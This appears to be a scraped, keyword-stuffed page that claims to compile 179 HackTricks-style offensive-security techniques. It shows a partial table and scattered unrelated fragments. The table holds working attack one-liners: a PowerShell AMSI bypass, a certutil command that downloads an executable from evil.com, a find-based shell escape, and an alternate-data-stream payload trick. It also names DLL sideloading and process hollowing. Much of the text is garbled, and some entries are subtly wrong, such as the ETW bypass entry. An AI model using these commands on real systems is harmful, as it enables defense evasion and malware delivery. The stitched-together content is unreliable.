Below is a concise, structured, and actionable compilation of 179 practical offensive-security techniques, tools, and workflows inspired by common pentesting references and aggregated best practices. Each entry includes a short description, when to use it, and concise actionable steps or commands. Use responsibly and only on systems you own or are authorized to test.
Tunneling via HTTPS (stunnel, nginx reverse proxy) hacktricks 179 best
Hardware implant concepts (COTS implants) HackTricks — Top 179 Techniques (detailed guide) Below
Verify if the organization uses RPKI to prevent prefix hijacking. 4. The HackTricks Methodology Try 7 7, $7 7, and payloads for Jinja, Twig, etc
| # | Trick | Description |
|---|-------|-------------|
| 141 | AMSI bypass (powershell) | [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) |
| 142 | ETW bypass (syscall) | NtRaiseHardError + NtCreateThreadEx |
| 143 | DLL sideloading | Place malicious version.dll in app folder |
| 144 | Alternate data streams | type payload.exe > legit.txt:payload.exe |
| 145 | LOLBAS (living off the land) | certutil -urlcache -f http://evil.com/file.exe file.exe |
| 146 | GTFOBins for *nix | find . -exec /bin/sh \; -quit |
| ... | ... | ... |
| 160 | Process hollowing | Create suspended process → replace image |
Incorrect routing information is propagated beyond its intended scope, often due to misconfiguration.